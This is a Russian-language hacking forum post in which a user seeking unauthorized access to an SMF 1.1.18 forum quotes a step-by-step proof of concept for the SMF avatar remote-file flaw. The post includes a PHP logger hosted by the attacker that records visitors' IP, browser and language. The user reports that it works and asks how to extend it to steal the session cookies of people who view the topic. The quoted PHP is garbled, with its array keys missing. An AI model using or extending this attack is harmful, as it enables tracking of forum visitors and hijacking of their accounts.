Получить куки на SMF 1.1.18

Получить куки на SMF 1.1.18

20.04.2010, 19:34

br1tva

Познающий

Регистрация: 26.12.2007

Сообщений: 38

С нами: 9671107

Репутация: 8

Получить куки на SMF 1.1.18

Значит нужен доступ к одному форуму , версия форума 1.1.18 .
Нашел под форум exploit :

Simple Machines Forum <= 1.1.8 (avatar) Remote PHP File Execute PoC

- Step by Step:

1) go to your profile in section of avatar.
2) put the url of the malicious php file as avatar (ex: http://target/poc.php).
3) create a new topic.

- [victims] All the people that visit the topic will be infect.

malicious file example [steal info]: (poc.php)

PHP код:


		
			
<?php   $ip = $_SERVER;   $so= $_SERVER;   $lan= $_SERVER;   $url= $_SERVER;   $path= $_SERVER;   $archivo = 'hacks.txt';   $fp = fopen($archivo, "a");   $string = "   Simple Machines Forum <= 1.1.8 (avatar) rpfe PoC       $path$url     VICTIM: $ip     info: $so   language: $lan       ";   $write = fputs($fp, $string);   fclose($fp);   ?>

Делаю все как указанно выше , на моем хосте в файл hacks.txt пишется Ип , Время , Дата и sysinfo . Возможно ли с помощью этого exploita тянуть куки зашедших в топик ???